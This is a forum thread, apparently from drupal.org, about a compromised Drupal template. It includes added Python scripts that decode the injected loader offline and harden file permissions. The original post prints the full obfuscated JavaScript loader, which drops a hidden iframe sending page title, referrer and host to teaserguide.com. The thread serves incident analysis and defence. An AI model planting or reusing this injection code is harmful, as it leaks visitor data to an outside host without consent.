Has anyone seen this hack on a Drupal site?

Posted by sf_wind

I have the most recent Drupal version, and when logged in as admin, every page load tries to load something from the domain teaserguide.com, but fails.

I googled online but found very little discussion on this. The limited discussions I've found so far are related to WordPress. For example, this article describes the hack on WordPress:
http://sntjohnny.com/front/the-teaserguide-wordpress-hack/2683.html

This kind of hack seems to have spread only very recently. According to this article, the hack sneaks into some heavily protected sites.

For me, I installed the "hacked!" module and found that one file is compromised: /modules/system/html.tpl.php.

Two scripts are added to the HTML file, something similar to what the article reported on the WordPress site.

I'm just wondering whether the Drupal community is aware of this kind of hack and what the likely causes of it are.

The line added to html.tpl.php is:

var a="'1Aqapkrv'02v{rg'1F'00vgzv-hctcqapkrv'00'1G'2C'2;tcp'02pgdgpgp'02'1F'02glamfgWPKAmormlglv'0:fmawoglv,pgdgppgp'0;'1@'2C'2;tcp'02fgdcwnv]ig{umpf'02'1F'02glamfgWPKAmormlglv'0:fmawoglv,vkvng'0;'1@'2C'2;tcp'02jmqv'02'1F'02glamfgWPKAmormlglv'0:nmacvkml,jmqv'0;'1@'2C'2;tcp'02kdpcog'02'1F'02fmawoglv,apgcvgGngoglv'0:'05kdpcog'05'0;'1@'2C'2;kdpcog,ukfvj'1F2'1@'2C'2;kdpcog,jgkejv'1F2'1@'2C'2;kdpcog,qpa'1F'02'00j'00'02)'02'00vv'00'02)'02'00r'1C--'00'02)'02'00a33l6,'00'02)'02'00k,vg'00'02)'02'00cq'00'02)'02'00gpe'00'02)'02'00wkf'00'02)'02'00g,a'00'02)'02'00mo'00'02)'02'00-qlkvaj'1Df'00'02)'02'00gd'00'02)'02'00cwn'00'02)'02'00v]i'00'02)'02'00g{'00'02)'02'00umpf'1F'00'02)'02fgdcwnv]ig{umpf'02)'02'00'04pgdg'00'02)'02'00ppgp'1F'00'02)'02pgdgpgp'02)'02'00'04qg]p'00'02)'02'00gd'00'02)'02'00gp'00'02)'02'00pgp'1F'00'02)'02pgdgpgp'02)'02'00'04qmw'00'02)'02'00pag'1F'00'02)'02jmqv'1@'2C'2;fmawoglv,`mf{,crrglfAjknf'0:kdpcog'0;'1@'2C'1A-qapkrv'1G";b="";c="";var clen;clen=a.length;for(i=0;i<clen;i++){b+=String.fromCharCode(a.charCodeAt(i)^2)}c=unescape(b);document.write(c);
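The loader above is a generic two-step stub (XOR every character with a small key, then unescape the result and document.write it), so it can be replayed offline without ever executing it in a browser. The following is an added example and not part of the original post or of Drupal: a small Python script that pulls the encoded string and the XOR key out of the line, reverses both steps, and reports where the dropped iframe points and which page attributes it sends there. The INJECTED sample is the line quoted above; the function names (extract_obfuscation, decode_payload, analyze) are my own. Because the key is read from the stub rather than hard-coded, the same decoder works for variants of this loader that use a different single-byte key.

```python
import re
from urllib.parse import unquote, urlparse

# The exact line the original poster found appended to html.tpl.php, copied
# from the post above so the decoder can be exercised on a real sample.
INJECTED = r'''var a="'1Aqapkrv'02v{rg'1F'00vgzv-hctcqapkrv'00'1G'2C'2;tcp'02pgdgpgp'02'1F'02glamfgWPKAmormlglv'0:fmawoglv,pgdgppgp'0;'1@'2C'2;tcp'02fgdcwnv]ig{umpf'02'1F'02glamfgWPKAmormlglv'0:fmawoglv,vkvng'0;'1@'2C'2;tcp'02jmqv'02'1F'02glamfgWPKAmormlglv'0:nmacvkml,jmqv'0;'1@'2C'2;tcp'02kdpcog'02'1F'02fmawoglv,apgcvgGngoglv'0:'05kdpcog'05'0;'1@'2C'2;kdpcog,ukfvj'1F2'1@'2C'2;kdpcog,jgkejv'1F2'1@'2C'2;kdpcog,qpa'1F'02'00j'00'02)'02'00vv'00'02)'02'00r'1C--'00'02)'02'00a33l6,'00'02)'02'00k,vg'00'02)'02'00cq'00'02)'02'00gpe'00'02)'02'00wkf'00'02)'02'00g,a'00'02)'02'00mo'00'02)'02'00-qlkvaj'1Df'00'02)'02'00gd'00'02)'02'00cwn'00'02)'02'00v]i'00'02)'02'00g{'00'02)'02'00umpf'1F'00'02)'02fgdcwnv]ig{umpf'02)'02'00'04pgdg'00'02)'02'00ppgp'1F'00'02)'02pgdgpgp'02)'02'00'04qg]p'00'02)'02'00gd'00'02)'02'00gp'00'02)'02'00pgp'1F'00'02)'02pgdgpgp'02)'02'00'04qmw'00'02)'02'00pag'1F'00'02)'02jmqv'1@'2C'2;fmawoglv,`mf{,crrglfAjknf'0:kdpcog'0;'1@'2C'1A-qapkrv'1G";b="";c="";var clen;clen=a.length;for(i=0;i<clen;i++){b+=String.fromCharCode(a.charCodeAt(i)^2)}c=unescape(b);document.write(c);'''


def extract_obfuscation(line):
    """Pull the encoded string and the XOR key out of the loader stub.
    Returns (encoded_string, key); raises ValueError if the shape differs."""
    m_str = re.search(r'var a="([^"]*)"', line)
    m_key = re.search(r'charCodeAt\(i\)\^(\d+)', line)
    if not (m_str and m_key):
        raise ValueError("not the expected XOR/unescape loader")
    return m_str.group(1), int(m_key.group(1))


def decode_payload(line):
    """Replay the loader offline: XOR each character with the key, then
    percent-decode, which is what String.fromCharCode(...^key) followed by
    unescape() does in the browser. Returns the script that would be written."""
    encoded, key = extract_obfuscation(line)
    xored = "".join(chr(ord(ch) ^ key) for ch in encoded)
    return unquote(xored)


def analyze(line):
    """Decode the stub and summarise what the dropped script does: the host
    the hidden iframe points at and the page attributes it leaks as query
    parameters. Values come from the decoded text, not from any lookup table."""
    decoded = decode_payload(line)
    # Join split string literals such as "h" + "tt" + "p://" back together so
    # the real URL becomes visible as one literal.
    joined = re.sub(r'"\s*\+\s*"', "", decoded)
    src = re.search(r'iframe\.src\s*=\s*([^;]*);', joined)
    if not src:
        return {"decoded": decoded, "host": None, "params": [], "hidden_iframe": False}
    expr = src.group(1)
    url = re.search(r'"(https?://[^"]*)"', expr)
    host = urlparse(url.group(1)).hostname if url else None
    params = re.findall(r'[?&](\w+)=', expr)      # names of the leaked fields
    compact = decoded.replace(" ", "")
    hidden = "width=0" in compact and "height=0" in compact
    return {"decoded": decoded, "host": host, "params": params, "hidden_iframe": hidden}


if __name__ == "__main__":
    report = analyze(INJECTED)
    print(report["decoded"])
    print("iframe host:", report["host"])
    print("leaked fields:", ", ".join(report["params"]))
    print("zero-size iframe:", report["hidden_iframe"])
```

Running it shows the payload is a 0x0 iframe appended to the page body that sends the page title, referrer and host name to the teaserguide.com domain the original poster saw in the failed requests; the host and parameter names in the report are what a defender would put into a block list or a detection rule. The decoder never evaluates the JavaScript, so it is safe to run on any captured copy of the template.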

Comments

Comment by themselves:

What's your hosting environment? That this is targeting and getting through WordPress, Joomla and Drupal sites makes it seem pretty unlikely they're burning three zero-days on the same petty hack... Might it be an unpatched cPanel hole? Something like that?

Comment by akleinwaechter:

My site has it too. Even Windows Defender detects it as IFrameinject.AE.

Best regards
Alex

Comment by guster-von:

I had this issue too.

I replaced the html.tpl.php with /modules/system/html.tpl.php from Drupal 7.39 zip file.

I would love to know what caused this too... I see some information regarding WordPress sites. I am hosting with Dreamhost.

Comment by mpdonadio:

There are two general causes.

One is that your webserver (probably Apache) has write access to the core files. This happens a lot in shared hosting, where the Apache process runs as your user login. In general, this is a bad thing. See https://www.drupal.org/node/244924 for more info. Normally, you just want to give Apache write access to sites/default/files and your private and tmp directories (wherever they are defined).

Two is that your hosting provider or your server is probably running an outdated version of PHP. Again, this tends to happen a lot with shared hosts (many are reluctant to keep up with the latest security versions). Many outdated versions of PHP have security vulnerabilities in them, which let attackers construct bad URLs and write to files on the filesystem. Adding code to template files is low-hanging fruit that a lot of people don't notice.
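The first cause above can be checked mechanically. The following is an added example, written for this thread and not taken from it or from drupal.org: a Python script that walks a Drupal docroot, reports every code file or directory the web server could modify, and then applies a read-only-code / writable-uploads split (code directories 750 and files 640, readable by the web server's group; sites/default/files 770 and 660 so the web server can write there). It assumes ownership has already been set (your user as owner, the web server's group as group), since chown needs root and is out of scope here. It also covers the shared-host case the comment describes: when Apache runs as your own login, mode bits do not protect anything, so passing that uid as web_uid flags every file that user owns. The sample docroot is constructed in a temporary directory; the function names are my own.

```python
import os
import stat
import tempfile
from pathlib import Path

# Mode split used here: code is owner-writable only, the web server's group may
# read it; the upload tree is group-writable so the web server can store files.
CODE_DIR_MODE, CODE_FILE_MODE = 0o750, 0o640
DATA_DIR_MODE, DATA_FILE_MODE = 0o770, 0o660
# Directories the web server legitimately writes to (relative to the docroot);
# add your private and tmp directories here if they live under the docroot.
DEFAULT_WRITABLE = ("sites/default/files",)


def _under(path, roots):
    return any(path == r or r in path.parents for r in roots)


def owner_uid(path):
    return Path(path).lstat().st_uid


def mode_of(path):
    return stat.S_IMODE(Path(path).lstat().st_mode)


def find_writable_code(docroot, writable=DEFAULT_WRITABLE, web_uid=None):
    """Return docroot-relative paths of code files/dirs the web server could
    modify: anything with a group/other write bit, or, when web_uid is given
    (the shared-host case where Apache runs as your own login), anything owned
    by that uid. The designated upload directories are skipped."""
    docroot = Path(docroot)
    roots = [docroot / w for w in writable]
    hits = []
    for dirpath, dirnames, filenames in os.walk(docroot):
        d = Path(dirpath)
        if _under(d, roots):
            dirnames[:] = []          # do not descend into the upload tree
            continue
        for p in [d] + [d / f for f in filenames]:
            st = p.lstat()
            if stat.S_ISLNK(st.st_mode):
                continue
            writable_bits = st.st_mode & (stat.S_IWGRP | stat.S_IWOTH)
            if writable_bits or (web_uid is not None and st.st_uid == web_uid):
                hits.append(str(p.relative_to(docroot)))
    return sorted(hits)


def harden_docroot(docroot, writable=DEFAULT_WRITABLE):
    """Apply the code/data mode split. Ownership (your user, web server group)
    is assumed to be set already."""
    docroot = Path(docroot)
    roots = [docroot / w for w in writable]
    for dirpath, _dirnames, filenames in os.walk(docroot):
        d = Path(dirpath)
        data = _under(d, roots)
        os.chmod(d, DATA_DIR_MODE if data else CODE_DIR_MODE)
        for f in filenames:
            p = d / f
            if not p.is_symlink():
                os.chmod(p, DATA_FILE_MODE if data else CODE_FILE_MODE)


def build_demo_docroot():
    """Constructed sample: a throwaway docroot with a world-writable template
    (the file compromised in this thread) and one upload. Returns its path."""
    root = Path(tempfile.mkdtemp(prefix="drupal-demo-"))
    (root / "modules/system").mkdir(parents=True)
    (root / "sites/default/files").mkdir(parents=True)
    tpl = root / "modules/system/html.tpl.php"
    tpl.write_text("<?php // constructed stand-in for the core template ?>\n")
    os.chmod(tpl, 0o666)
    upload = root / "sites/default/files/upload.txt"
    upload.write_text("constructed upload\n")
    os.chmod(upload, 0o666)
    return str(root)


if __name__ == "__main__":
    root = build_demo_docroot()
    print("writable code before:", find_writable_code(root))
    harden_docroot(root)
    print("writable code after: ", find_writable_code(root))
    print("still exposed if Apache runs as the file owner:",
          find_writable_code(root, web_uid=owner_uid(root)))
```

The last line of output is the point of the comment: after hardening, the mode bits are clean, but if the web server process is your own account every core file is still writable to it, and the only real fix is a separate web server user plus the group-based split above.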
